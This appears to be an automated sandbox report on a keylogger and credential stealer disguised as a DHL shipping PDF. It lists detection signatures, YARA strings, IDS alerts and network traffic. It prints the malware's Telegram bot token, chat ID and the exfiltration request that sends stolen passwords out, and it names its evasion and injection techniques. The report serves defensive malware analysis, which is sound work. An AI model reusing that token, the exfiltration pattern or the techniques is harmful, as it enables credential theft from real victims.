Windows Analysis Report
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Overview

General Information

Sample name: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Analysis ID: 1629834
MD5: d45fff48d75acf82385ac74580662c30
SHA1: 98da0ec9c1e4704ca3fe62b9d29396b874f8fa30
SHA256: e6a62cde2fa594e289dfdd4247f068ae5dc523174646615b312a20af28e90487
Tags: DHL, exe, user-abuse_ch

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
{"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}
Source | Rule | Description | Author | Strings
00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security |
00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | see strings below
  • 0x2754f:$a1: get_encryptedPassword
  • 0x27877:$a2: get_encryptedUsername
  • 0x272ea:$a3: get_timePasswordChanged
  • 0x2740b:$a4: get_passwordField
  • 0x27565:$a5: set_encryptedPassword
  • 0x28ec1:$a7: get_logins
  • 0x28b72:$a8: GetOutlookPasswords
  • 0x28964:$a9: StartKeylogger
  • 0x28e11:$a10: KeyLoggerEventArgs
  • 0x289c1:$a11: KeyLoggerEventArgsEventHandler

Source | Rule | Description | Author | Strings
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack | JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security |
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | see strings below
  • 0xf1b7:$a1: get_encryptedPassword
  • 0xf4df:$a2: get_encryptedUsername
  • 0xef52:$a3: get_timePasswordChanged
  • 0xf073:$a4: get_passwordField
  • 0xf1cd:$a5: set_encryptedPassword
  • 0x10b29:$a7: get_logins
  • 0x107da:$a8: GetOutlookPasswords
  • 0x105cc:$a9: StartKeylogger
  • 0x10a79:$a10: KeyLoggerEventArgs
  • 0x10629:$a11: KeyLoggerEventArgsEventHandler

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-05T08:34:34.496110+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49733 | 149.154.167.220 | 443 | TCP
2025-03-05T08:34:26.959962+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49711 | 132.226.8.169 | 80 | TCP
2025-03-05T08:34:33.413202+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49711 | 132.226.8.169 | 80 | TCP
2025-03-05T08:34:34.064553+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49733 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4552.3.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Virustotal: Detection: 31%
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, ReversingLabs: Detection: 26%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: NKUn.pdb source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: Binary string: NKUn.pdbSHA2569x source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05365782h | 3_2_05365358
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 053651B9h | 3_2_05364F08
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05365782h | 3_2_053656AF
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544D088h | 3_2_0544CDE0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05441935h | 3_2_054415F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05440FF1h | 3_2_05440D48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544C7D8h | 3_2_0544C530
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544F028h | 3_2_0544ED80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05443EF8h | 3_2_05443C50
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544DEC8h | 3_2_0544DC20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544E778h | 3_2_0544E4D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544BF28h | 3_2_0544BC80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05440741h | 3_2_05440498
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 054431F0h | 3_2_05442F48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544B220h | 3_2_0544AF78
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05443AA0h | 3_2_054437F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544A0C0h | 3_2_05449E18
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544F8D8h | 3_2_0544F630
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544A970h | 3_2_0544A6C8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544D93Ah | 3_2_0544D690
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544EBD0h | 3_2_0544E928
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544F480h | 3_2_0544F1D8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544CC30h | 3_2_0544C988
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05441449h | 3_2_054411A0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 054402E9h | 3_2_05440040
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544E320h | 3_2_0544E078
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544BAD0h | 3_2_0544B828
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544C380h | 3_2_0544C0D8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05440B99h | 3_2_054408F0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05444350h | 3_2_054440A8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544ADC8h | 3_2_0544AB20
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544B678h | 3_2_0544B3D0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05443648h | 3_2_054433A0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544A518h | 3_2_0544A270
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544D4E0h | 3_2_0544D238
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 05442D98h | 3_2_05442AF0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 4x nop then jmp 0544FD30h | 3_2_0544FA88

Networking

Source: Network traffic, Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49733 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49733 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd5b8e42c46e6e | Host: api.telegram.org | Content-Length: 1088 | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 132.226.8.169
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: checkip.dyndns.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49711 -> 132.226.8.169:80
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown, HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic, DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: unknown, HTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd5b8e42c46e6e | Host: api.telegram.org | Content-Length: 1088 | Connection: Keep-Alive
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.telegram.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.telegram.orgd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.com
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.comd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/d
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/q
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.orgd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://reallyfreegeoip.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F7B000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://reallyfreegeoip.orgd
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000003034000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown, Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, UltraSpeed.cs, .Net Code: VKCodeToUnicode
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, UltraSpeed.cs, .Net Code: VKCodeToUnicode

System Summary

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPE, Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_0706618C
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_070673A8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_0706617D
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_071464DE
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_0714A6A8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_07149408
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_07148FD0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_07148B98
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 0_2_0714AAE0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_053627B5
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0536C168
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05364F08
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05367E68
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0536CA58
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05362DD1
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05367E59
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05364EF8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0536B9E0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05444500
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544CDE0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_054415F8
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05441C58
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05447770
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05446998
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05440D48
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544ED70
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544C520
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544C530
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05440D3A
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544CDD0
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_054415EA
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544ED80
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05443C41
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_05443C50
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, Code function: 3_2_0544BC71
